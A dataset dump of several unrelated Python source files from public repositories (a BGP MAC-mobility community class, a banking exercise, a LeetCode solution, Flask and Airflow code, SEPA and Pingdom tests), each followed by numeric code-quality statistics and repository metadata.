Created by Anton Aksola on 2018-11-03
"""
from struct import pack
from struct import unpack
from exabgp.bgp.message.update.attribute.community.extended import ExtendedCommunity
# ================================================================== MacMobility
# RFC 7432 Section 7.7.
@ExtendedCommunity.register
class MacMobility (ExtendedCommunity):
COMMUNITY_TYPE = 0x06
COMMUNITY_SUBTYPE = 0x00
DESCRIPTION = 'mac-mobility'
__slots__ = ['sequence','sticky']
def __init__ (self, sequence, sticky=False, community=None):
self.sequence = sequence
self.sticky = sticky
ExtendedCommunity.__init__(
self,
community if community else pack(
'!2sBxI',
self._subtype(transitive=True),
1 if sticky else 0,
sequence
)
)
def __hash__ (self):
return hash((self.sticky, self.sequence))
def __repr__ (self):
s = "%s:%d" % (self.DESCRIPTION, self.sequence)
if self.sticky:
s += ":sticky"
return s
@staticmethod
def unpack (data):
flags, seq = unpack('!BxI', data[2:8])
return MacMobility(seq, True if flags == 1 else False)
| 22.26 | 84 | 0.666667 | 134 | 1,113 | 5.358209 | 0.485075 | 0.066852 | 0.044568 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029064 | 0.165319 | 1,113 | 49 | 85 | 22.714286 | 0.743811 | 0.154537 | 0 | 0 | 0 | 0 | 0.051557 | 0 | 0 | 0 | 0.008593 | 0 | 0 | 1 | 0.125 | false | 0 | 0.09375 | 0.03125 | 0.46875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e780d9438e176381d9f02f6add14e1524a0e07ab | 867 | py | Python | aprendizado/udemy/03_desafio_POO/main.py | renatodev95/Python | 2adee4a01de41f8bbb68fce563100c135a5ab549 | [
"MIT"
] | null | null | null | aprendizado/udemy/03_desafio_POO/main.py | renatodev95/Python | 2adee4a01de41f8bbb68fce563100c135a5ab549 | [
"MIT"
] | null | null | null | aprendizado/udemy/03_desafio_POO/main.py | renatodev95/Python | 2adee4a01de41f8bbb68fce563100c135a5ab549 | [
"MIT"
] | null | null | null | from banco import Banco
from cliente import Cliente
from conta import ContaCorrente, ContaPoupanca
banco = Banco()
cliente1 = Cliente('Luiz', 30)
cliente2 = Cliente('Maria', 18)
cliente3 = Cliente('João', 50)
conta1 = ContaPoupanca(1111, 254136, 0)
conta2 = ContaCorrente(2222, 254137, 0)
conta3 = ContaPoupanca(1212, 254138, 0)
cliente1.inserir_conta(conta1)
cliente2.inserir_conta(conta2)
cliente3.inserir_conta(conta3)
banco.inserir_cliente(cliente1)
banco.inserir_conta(conta1)
banco.inserir_cliente(cliente2)
banco.inserir_conta(conta2)
if banco.autenticar(cliente1):
cliente1.conta.depositar(40)
cliente1.conta.sacar(20)
else:
print('Cliente não autenticado')
print('#################################')
if banco.autenticar(cliente2):
cliente2.conta.depositar(40)
cliente2.conta.sacar(20)
else:
print('Cliente não autenticado.') | 22.815789 | 46 | 0.734717 | 105 | 867 | 6 | 0.352381 | 0.095238 | 0.057143 | 0.050794 | 0.133333 | 0.133333 | 0.133333 | 0.133333 | 0 | 0 | 0 | 0.089961 | 0.11534 | 867 | 38 | 47 | 22.815789 | 0.731421 | 0 | 0 | 0.071429 | 0 | 0 | 0.107143 | 0.038018 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.107143 | 0 | 0.107143 | 0.107143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e781cdbe0452060897cb4aa77bea0b37fe424f36 | 386 | py | Python | detection_tf/scripts/stuff/node_finder.py | hywel1994/SARosPerceptionKitti | 82c307facb5b39e47c510fbdb132962cebf09d2e | [
"MIT"
] | 5 | 2019-01-17T03:08:41.000Z | 2021-10-31T17:02:11.000Z | detection_tf/scripts/stuff/node_finder.py | hywel1994/SARosPerceptionKitti | 82c307facb5b39e47c510fbdb132962cebf09d2e | [
"MIT"
] | 11 | 2020-02-05T00:36:38.000Z | 2020-05-31T23:20:21.000Z | detection_tf/scripts/stuff/node_finder.py | hywel1994/SARosPerceptionKitti | 82c307facb5b39e47c510fbdb132962cebf09d2e | [
"MIT"
] | 4 | 2018-11-02T09:57:59.000Z | 2021-04-27T01:20:04.000Z | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 11 15:58:42 2018
@author: gustav
"""
import tensorflow as tf
NODE_OPS = ['Placeholder','Identity']
MODEL_FILE = '../models/ssd_mobilenet_v11_coco/frozen_inference_graph.pb'
gf = tf.GraphDef()
gf.ParseFromString(open(MODEL_FILE,'rb').read())
print([n.name + '=>' + n.op for n in gf.node if n.op in (NODE_OPS)])
| 21.444444 | 73 | 0.681347 | 63 | 386 | 4.031746 | 0.793651 | 0.055118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047761 | 0.132124 | 386 | 17 | 74 | 22.705882 | 0.710448 | 0.248705 | 0 | 0 | 0 | 0 | 0.288256 | 0.206406 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e78557afcf99f289bebfa26454aa02ac75ba1622 | 1,483 | py | Python | Clustering_Algorithms/create_chart.py | NikhilGupta1997/Data-Mining-Algorithms | 56c9acca3d4f62b72e0ec22e150421eaee2dc850 | [
"MIT"
] | 7 | 2018-12-25T07:52:51.000Z | 2021-05-17T23:53:18.000Z | Clustering_Algorithms/create_chart.py | NikhilGupta1997/Data-Mining-Algorithms | 56c9acca3d4f62b72e0ec22e150421eaee2dc850 | [
"MIT"
] | null | null | null | Clustering_Algorithms/create_chart.py | NikhilGupta1997/Data-Mining-Algorithms | 56c9acca3d4f62b72e0ec22e150421eaee2dc850 | [
"MIT"
] | null | null | null | import numpy as np
import sys
import matplotlib.pyplot as plt
file = 'optics.txt'
minpts = int(sys.argv[1])
epsilon = float(sys.argv[2])
X = []
Y = []
cluster_inds = []
inds = []
noise = []
buff = []
counter = 0
for i, line in enumerate(open(file).readlines()):
counter += 1
val = line.strip().split()
idx = int(val[0])
dist = float(val[1])
if dist < 0.0:
dist = epsilon*epsilon
buff.append(idx)
if len(inds) > 100*minpts:
cluster_inds.append(inds)
noise.extend(buff)
buff = []
inds = []
else:
inds.append(idx)
X.append(i)
Y.append(dist)
noise.extend(buff)
noise.extend(inds)
# if len(inds) >= 0:
# cluster_inds.append(inds)
# cluster_inds.append(noise)
plt.figure()
plt.plot(X, Y)
plt.legend()
plt.xlabel('Point ID')
plt.ylabel('Reachability Distance')
plt.xticks([])
plt.title('Reachability Graph')
# plt.show()
dataset = sys.argv[3]
data = np.array([val.strip().split() for val in open(dataset, 'r').readlines()])
if data.shape[1] == 2:
X = data[:, 0]
Y = data[:, 1]
color = {4: 'red', 1: 'blue', 2: 'green', 3: 'yellow', 0: 'black', 5: 'cyan', 6: 'magenta', }
plt.figure()
count = 0
for i, inds in enumerate(cluster_inds):
count += len(inds)
print(count, len(inds))
x_val = X[inds]
y_val = Y[inds]
plt.scatter(x_val, y_val, c=color[(i%6+1)], s=2, edgecolor=color[(i%6+1)])
# print noise
count += len(noise)
print(count, len(noise))
x_val = X[noise]
y_val = Y[noise]
plt.scatter(x_val, y_val, c='black', s=2)
plt.show() | 20.315068 | 94 | 0.631153 | 247 | 1,483 | 3.736842 | 0.323887 | 0.059588 | 0.055255 | 0.045504 | 0.04117 | 0.04117 | 0.04117 | 0 | 0 | 0 | 0 | 0.025122 | 0.167903 | 1,483 | 73 | 95 | 20.315068 | 0.722853 | 0.064059 | 0 | 0.135593 | 0 | 0 | 0.070137 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.050847 | 0 | 0.050847 | 0.033898 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e787bcef0fe3c055b3e9f9ae08c31b576c247a87 | 2,376 | py | Python | random_video.py | enriqueav/the_random_video | 0dbeef2efbbad33351fd106b16095b4bb3ed8821 | [
"MIT"
] | 1 | 2020-11-07T17:15:27.000Z | 2020-11-07T17:15:27.000Z | random_video.py | enriqueav/the_random_video | 0dbeef2efbbad33351fd106b16095b4bb3ed8821 | [
"MIT"
] | null | null | null | random_video.py | enriqueav/the_random_video | 0dbeef2efbbad33351fd106b16095b4bb3ed8821 | [
"MIT"
] | null | null | null | import argparse
import time
from taor.randomvideo import random_video
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Create random videos. The --seed argument can be used to generate'
'consistent results. By default the name of the video will contain the epoch'
'time of generation, otherwise --image_path can be used to overwrite this.'
)
parser.add_argument("-s", "--seed",
help="Initialize numpy with a given seed. "
"Can be used to obtain consistent results.",
type=int)
parser.add_argument("-i", "--image_path",
help="Name of the file to create. "
"Epoch time is used as filename if -i is not specified.")
parser.add_argument("-d", "--debug",
help="Enter DEBUG mode.",
action="store_true")
parser.add_argument("-q", "--quantity",
help="Quantity of videos to generate. Default is 1."
"If --seed is set, the seed is used for the first video "
"and then 1 is added for each one of the following.",
type=int,
default=1)
parser.add_argument("-f", "--frames",
help="Quantity of video frames to generate. "
"Default of 24*60*2 == 2880, for a 2 minutes video at 24 FPS.",
type=int,
default=24*60*2)
args = parser.parse_args()
seed = args.seed
image_path = args.image_path
frames = args.frames
for i in range(args.quantity):
if args.seed:
seed = args.seed + i
pre = args.image_path or "./results/" + str(int(time.time()))
image_path = pre + "_seed%d.avi" % seed
elif args.quantity > 1:
pre = args.image_path or "./results/" + str(int(time.time()))
image_path = pre + "_number%d.avi" % i
else:
pre = args.image_path or "./results/" + str(int(time.time()))
image_path = pre + ".avi"
random_video(file_name=image_path,
debug=args.debug,
seed=seed,
total_frames=frames)
| 44.830189 | 97 | 0.513889 | 278 | 2,376 | 4.276978 | 0.345324 | 0.083263 | 0.071489 | 0.027754 | 0.12868 | 0.12868 | 0.12868 | 0.12868 | 0.12868 | 0.12868 | 0 | 0.014354 | 0.384259 | 2,376 | 52 | 98 | 45.692308 | 0.79836 | 0 | 0 | 0.102041 | 0 | 0 | 0.322391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.061224 | 0 | 0.061224 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e787dc94ca4111ab33a1d29a9785aad5e480ebdf | 2,524 | py | Python | src/leetcode_1743_restore_the_array_from_adjacent_pairs.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | src/leetcode_1743_restore_the_array_from_adjacent_pairs.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | src/leetcode_1743_restore_the_array_from_adjacent_pairs.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | # @l2g 1743 python3
# [1743] Restore the Array From Adjacent Pairs
# Difficulty: Medium
# https://leetcode.com/problems/restore-the-array-from-adjacent-pairs
#
# There is an integer array nums that consists of n unique elements,but you have forgotten it.However,
# you do remember every pair of adjacent elements in nums.
# You are given a 2D integer array adjacentPairs of size n - 1 where each adjacentPairs[i] = [ui,
# vi] indicates that the elements ui and vi are adjacent in nums.
# It is guaranteed that every adjacent pair of elements nums[i] and nums[i+1] will exist in adjacentPairs,
# either as [nums[i],nums[i+1]] or [nums[i+1],nums[i]].The pairs can appear in any order.
# Return the original array nums. If there are multiple solutions, return any of them.
#
# Example 1:
#
# Input: adjacentPairs = [[2,1],[3,4],[3,2]]
# Output: [1,2,3,4]
# Explanation: This array has all its adjacent pairs in adjacentPairs.
# Notice that adjacentPairs[i] may not be in left-to-right order.
#
# Example 2:
#
# Input: adjacentPairs = [[4,-2],[1,4],[-3,1]]
# Output: [-2,4,1,-3]
# Explanation: There can be negative numbers.
# Another solution is [-3,1,4,-2], which would also be accepted.
#
# Example 3:
#
# Input: adjacentPairs = [[100000,-100000]]
# Output: [100000,-100000]
#
#
# Constraints:
#
# nums.length == n
# adjacentPairs.length == n - 1
# adjacentPairs[i].length == 2
# 2 <= n <= 10^5
# -10^5 <= nums[i], ui, vi <= 10^5
# There exists some nums that has adjacentPairs as its pairs.
#
#
from typing import List
class Solution:
def restoreArray(self, adjacentPairs: List[List[int]]) -> List[int]:
pair_counter = defaultdict(list)
for pair in adjacentPairs:
pair_counter[pair[0]].append(pair)
pair_counter[pair[1]].append(pair[::-1])
single_node = set([node for node, value in pair_counter.items() if len(value) == 1])
ans = []
while len(single_node) != 0:
start_node = single_node.pop()
ans.append(start_node)
link = pair_counter[start_node][0]
pairs = pair_counter[link[1]]
while len(pairs) != 1:
pair_counter[link[1]].remove(link[::-1])
link = pairs[0]
ans.append(link[0])
pairs = pair_counter[link[1]]
ans.append(link[1])
single_node.remove(link[1])
return ans
if __name__ == "__main__":
import os
import pytest
pytest.main([os.path.join("tests", "test_1743.py")])
| 30.409639 | 106 | 0.638669 | 372 | 2,524 | 4.268817 | 0.360215 | 0.055416 | 0.011335 | 0.030227 | 0.06801 | 0.06801 | 0 | 0 | 0 | 0 | 0 | 0.049642 | 0.225832 | 2,524 | 82 | 107 | 30.780488 | 0.76305 | 0.557845 | 0 | 0.076923 | 0 | 0 | 0.023321 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.115385 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e789b7eb8d4c8742185f24806004dfff92a4a404 | 1,449 | py | Python | timetable/timetable.py | Huy-Ngo/usth-timetable-2 | d9f653ee2cb138b075c7c630b6f8be08d959cb08 | [
"MIT"
] | null | null | null | timetable/timetable.py | Huy-Ngo/usth-timetable-2 | d9f653ee2cb138b075c7c630b6f8be08d959cb08 | [
"MIT"
] | null | null | null | timetable/timetable.py | Huy-Ngo/usth-timetable-2 | d9f653ee2cb138b075c7c630b6f8be08d959cb08 | [
"MIT"
] | null | null | null | import datetime
from flask import (
Blueprint, flash, g, redirect, render_template, request, url_for, session
)
from werkzeug.exceptions import abort
from timetable.student_auth import login_required
from . import db, updater
bp = Blueprint('timetable', __name__)
@bp.route('/', methods=['GET'])
def index():
user_id = session.get('user_id')
if user_id is None:
return render_template('timetable/index.html')
else:
response = db.get({
'table_name': 'student',
'id': user_id
})
user_calendar_id = response['response']['timetable_id']
return redirect(url_for('r_calendar_view_now', calendar_id=user_calendar_id))
@bp.route('/<calendar_id>', methods=['GET'])
def r_calendar_view_now(calendar_id):
year = datetime.datetime.now().year
month = datetime.datetime.now().month
day = datetime.datetime.now().day
view = 'day' # later: replace it with personal preferred view. Preferred view is saved in cookie/local storage
return redirect(url_for('timetable.r_list_schedule', timetable_id=calendar_id, view=view, year=year, month=month, day=day))
@bp.route('/<timetable_id>/<view>/<int:year>/<int:month>/<int:day>', methods=['GET'])
def r_list_schedule(timetable_id, view, year, month, day):
response = updater.get_event(timetable_id, view, year, month, day)
return render_template(
'timetable/timetable.html', events=response['response'],
calendar_id=timetable_id, year=year,
month=month, day=day, view=view
)
| 30.1875 | 124 | 0.73844 | 207 | 1,449 | 4.961353 | 0.309179 | 0.06816 | 0.037975 | 0.056475 | 0.185979 | 0.149951 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118012 | 1,449 | 47 | 125 | 30.829787 | 0.803599 | 0.065562 | 0 | 0 | 0 | 0 | 0.172337 | 0.076923 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085714 | false | 0 | 0.142857 | 0 | 0.342857 | 0.057143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e78c94bb5cf3e2d928816be2ee0ebeb373a52cb8 | 4,912 | py | Python | apps/sepa/tests/integration.py | jfterpstra/onepercentclub-site | 43e8e01ac4d3d1ffdd5959ebd048ce95bb2dba0e | [
"BSD-3-Clause"
] | 7 | 2015-01-02T19:31:14.000Z | 2021-03-22T17:30:23.000Z | apps/sepa/tests/integration.py | jfterpstra/onepercentclub-site | 43e8e01ac4d3d1ffdd5959ebd048ce95bb2dba0e | [
"BSD-3-Clause"
] | 1 | 2015-03-06T08:34:59.000Z | 2015-03-06T08:34:59.000Z | apps/sepa/tests/integration.py | jfterpstra/onepercentclub-site | 43e8e01ac4d3d1ffdd5959ebd048ce95bb2dba0e | [
"BSD-3-Clause"
] | null | null | null | import os
import unittest
import decimal
from lxml import etree
from apps.sepa.sepa import SepaAccount, SepaDocument
from .base import SepaXMLTestMixin
class ExampleXMLTest(SepaXMLTestMixin, unittest.TestCase):
""" Attempt to test recreating an example XML file """
def setUp(self):
super(ExampleXMLTest, self).setUp()
# Read and validate example XML file
example_file = os.path.join(
self.directory, 'BvN-pain.001.001.03-example-message.xml'
)
self.example = etree.parse(example_file)
self.xmlschema.assertValid(self.example)
def test_generate_example(self):
""" Attempt to recreate example XML file. """
pass
class CalculateMoneyDonatedTests(SepaXMLTestMixin, unittest.TestCase):
"""
Generate and attempt to validate an XML file modelled after actual
transactions
"""
def setUp(self):
super(CalculateMoneyDonatedTests, self).setUp()
self.some_account = {
'name': '1%CLUB',
'iban': 'NL45RABO0132207044',
'bic': 'RABONL2U',
'id': 'A01'
}
self.another_account = {
'name': 'Nice Project',
'iban': 'NL13TEST0123456789',
'bic': 'TESTNL2A',
'id': 'P551'
}
self.third_account = {
'name': 'SHO',
'iban': 'NL28INGB0000000777',
'bic': 'INGBNL2A',
'id': 'P345'
}
self.payment1 = {
'amount': decimal.Decimal('50.00'),
'id': 'PAYMENT 1253675',
'remittance_info': 'some info'
}
self.payment2 = {
'amount': decimal.Decimal('25.00'),
'id': 'PAYMENT 234532',
'remittance_info': 'my info'
}
self.message_id = 'BATCH-1234'
payment_id = 'PAYMENTS TODAY'
# Create base for SEPA
sepa = SepaDocument(type='CT')
sepa.set_info(message_identification=self.message_id, payment_info_id=payment_id)
sepa.set_initiating_party(name=self.some_account['name'], id=self.some_account['id'])
some_account = SepaAccount(name=self.some_account['name'], iban=self.some_account['iban'],
bic=self.some_account['bic'])
sepa.set_debtor(some_account)
# Add a payment
another_account = SepaAccount(name=self.another_account['name'], iban=self.another_account['iban'],
bic=self.another_account['bic'])
sepa.add_credit_transfer(creditor=another_account, amount=self.payment1['amount'],
creditor_payment_id=self.payment1['id'],
remittance_information=self.payment1['remittance_info'])
# Add another payment
third_account = SepaAccount(name=self.third_account['name'], iban=self.third_account['iban'],
bic=self.third_account['bic'])
sepa.add_credit_transfer(creditor=third_account, creditor_payment_id=self.payment2['id'],
amount=self.payment2['amount'],
remittance_information=self.payment2['remittance_info'])
# Now lets get the xml for these payments
self.xml = sepa.as_xml()
def test_parse_xml(self):
""" Test parsing the generated XML """
# Still no errors? Lets check the xml.
tree = etree.XML(self.xml)
main = tree[0]
self.assertEqual(main.tag,
'{urn:iso:std:iso:20022:tech:xsd:pain.001.001.03}CstmrCdtTrfInitn'
)
header = main[0]
self.assertEqual(header.tag,
'{urn:iso:std:iso:20022:tech:xsd:pain.001.001.03}GrpHdr')
self.assertEqual(header[0].text, self.message_id)
# We should have two payments
self.assertEqual(header[2].text, "2")
# Total amount should be the sum of two payments coverted to euros
self.assertEqual(header[3].text, '75.00')
# Now lets check The second payment IBANs
second_payment = main[2]
namespaces = {
# Default
'pain': 'urn:iso:std:iso:20022:tech:xsd:pain.001.001.03',
'xsi': 'http://www.w3.org/2001/XMLSchema-instance'
}
self.assertEqual(
second_payment.find(
'pain:DbtrAcct/pain:Id/pain:IBAN', namespaces=namespaces
).text,
self.some_account['iban']
)
self.assertEqual(
second_payment.find(
'pain:CdtTrfTxInf/pain:CdtrAcct/pain:Id/pain:IBAN', namespaces=namespaces
).text,
self.third_account['iban']
)
def test_validate_xml(self):
""" Assert the XML is valid according to schema """
tree = etree.XML(self.xml)
self.xmlschema.assertValid(tree)
| 31.896104 | 107 | 0.578583 | 531 | 4,912 | 5.239171 | 0.306968 | 0.035586 | 0.037743 | 0.017254 | 0.155284 | 0.12509 | 0.099209 | 0.071172 | 0.040978 | 0.040978 | 0 | 0.042179 | 0.304967 | 4,912 | 153 | 108 | 32.104575 | 0.772701 | 0.112378 | 0 | 0.102041 | 0 | 0.030612 | 0.163687 | 0.065475 | 0 | 0 | 0 | 0 | 0.091837 | 1 | 0.05102 | false | 0.010204 | 0.061224 | 0 | 0.132653 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e78d0b3c483bba3574b16e118dcb9461ba02bf95 | 2,992 | py | Python | freeflow/core/tests/dag.py | enorha/freeflow | 5b655ce616d408e566b0b900f96b24804dc49578 | [
"Apache-2.0"
] | 1 | 2021-11-19T08:48:00.000Z | 2021-11-19T08:48:00.000Z | freeflow/core/tests/dag.py | enorha/freeflow | 5b655ce616d408e566b0b900f96b24804dc49578 | [
"Apache-2.0"
] | 1 | 2022-01-06T23:11:02.000Z | 2022-01-06T23:11:02.000Z | freeflow/core/tests/dag.py | enorha/freeflow | 5b655ce616d408e566b0b900f96b24804dc49578 | [
"Apache-2.0"
] | 2 | 2021-11-19T08:51:35.000Z | 2021-12-24T14:39:00.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import unittest
import freeflow.core.tests
from airflow import models as af_models
class DagTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._dag_files = freeflow.core.tests.dag_files
def test_dag_integrity(self):
def check_valid_dag(dag):
"""
Checks whether the python file is really a runnable DAG.
:param dag: python module (file)
:type dag: module
"""
self.assertTrue(
any(isinstance(var, af_models.DAG) for var in vars(dag).values()),
"File does not contains a DAG instance"
)
def check_single_dag_file(dag_class):
"""
Checks for count of the DAG in a single file. It should be
only one.
:param dag_class: list of DAG class instance
:type dag_class: list(DAG)
"""
self.assertTrue(
len(dag_class) <= 1,
"File should only contains a single DAG"
)
def check_dag_name(dag_class, filename):
"""
Checks that DAG name should be snake case and same with the
filename. If DAG versioning is needed, use <name>_v<number>
:param dag_class: list of DAG class instance
:type dag_class: list(DAG)
:param filename: the filename which DAG class(es) resides
:type filename: str
"""
dag_id = dag_class[0].dag_id
self.assertEqual(
dag_id.split('_v')[0],
filename,
"File name and DAG name should be the same"
)
self.assertTrue(
all(c.islower() or c.isdigit() or c == '_' for c in dag_id),
"DAG name should be all lower case"
)
def check_task_name_within_dag(task_class):
"""
Checks uniqueness of task name within a DAG to ensure clarity
:param task_class: list of task instance
:type task_class: list(BaseOperator)
"""
tasks = task_class
task_ids = []
for task in tasks:
task_ids.append(task.task_id)
self.assertTrue(
all(c.islower() or c.isdigit() or c == '_' or c == '-' for c in task.task_id),
"Task name should be all lower case"
)
self.assertEqual(
len(task_ids),
len(set(task_ids)),
"Task ID should not be duplicate"
)
for file in self._dag_files:
check_valid_dag(file['dag'])
check_single_dag_file(file['instance']['dags'])
check_dag_name(file['instance']['dags'], file['filename'])
check_task_name_within_dag(file['instance']['tasks'])
if __name__ == '__main__':
unittest.main()
| 31.829787 | 98 | 0.531417 | 357 | 2,992 | 4.271709 | 0.296919 | 0.057705 | 0.031475 | 0.029508 | 0.19082 | 0.152131 | 0.120656 | 0.120656 | 0.120656 | 0.120656 | 0 | 0.002153 | 0.379011 | 2,992 | 93 | 99 | 32.172043 | 0.818622 | 0.234291 | 0 | 0.12 | 0 | 0 | 0.136071 | 0 | 0 | 0 | 0 | 0 | 0.12 | 1 | 0.12 | false | 0 | 0.06 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e78d767af998e6e80008e8c991011efc8624eff7 | 1,429 | py | Python | pingdomexport/tests/load/test_checks_output.py | mattboston/pingdomexport | 1cd7acbf813abee0b9a7865b9cd4a1e166d55c37 | [
"MIT"
] | 4 | 2018-01-25T09:18:38.000Z | 2021-02-12T18:36:08.000Z | pingdomexport/tests/load/test_checks_output.py | mattboston/pingdomexport | 1cd7acbf813abee0b9a7865b9cd4a1e166d55c37 | [
"MIT"
] | 1 | 2018-12-04T18:42:06.000Z | 2021-05-25T14:03:32.000Z | pingdomexport/tests/load/test_checks_output.py | mattboston/pingdomexport | 1cd7acbf813abee0b9a7865b9cd4a1e166d55c37 | [
"MIT"
] | 3 | 2019-04-30T11:52:14.000Z | 2021-03-24T20:58:04.000Z | from pingdomexport.load import checks_output
class TestOutput:
def test_load(self, capsys):
checks_output.Output().load(
[
{
'hostname': 'www.a.com',
'use_legacy_notifications': True,
'lastresponsetime': 411,
'ipv6': False,
'type': 'http',
'name': 'A',
'resolution': 1,
'created': 1458372620,
'lasttesttime': 1459005934,
'status': 'up',
'id': 2057736
},
{
'lasterrortime': 1458938840,
'type': 'http',
'hostname': 'b.a.com',
'lastresponsetime': 827,
'created': 1458398619,
'lasttesttime': 1459005943,
'status': 'up',
'ipv6': False,
'use_legacy_notifications': True,
'resolution': 1,
'name': 'B',
'id': 2057910
}
]
)
out = capsys.readouterr()
assert len(out) == 2
assert 'Id,Name,Created at,Status,Hostname,Type\r\n2057736,A,1458372620,up,www.a.com,http\r\n2057910,B,1458398619,up,b.a.com,http\r\n' == out[0]
assert '' == out[1]
| 34.853659 | 152 | 0.401679 | 111 | 1,429 | 5.108108 | 0.495496 | 0.028219 | 0.024691 | 0.091711 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148396 | 0.476557 | 1,429 | 40 | 153 | 35.725 | 0.609626 | 0 | 0 | 0.263158 | 0 | 0.026316 | 0.253324 | 0.109867 | 0 | 0 | 0 | 0 | 0.078947 | 1 | 0.026316 | false | 0 | 0.026316 | 0 | 0.078947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |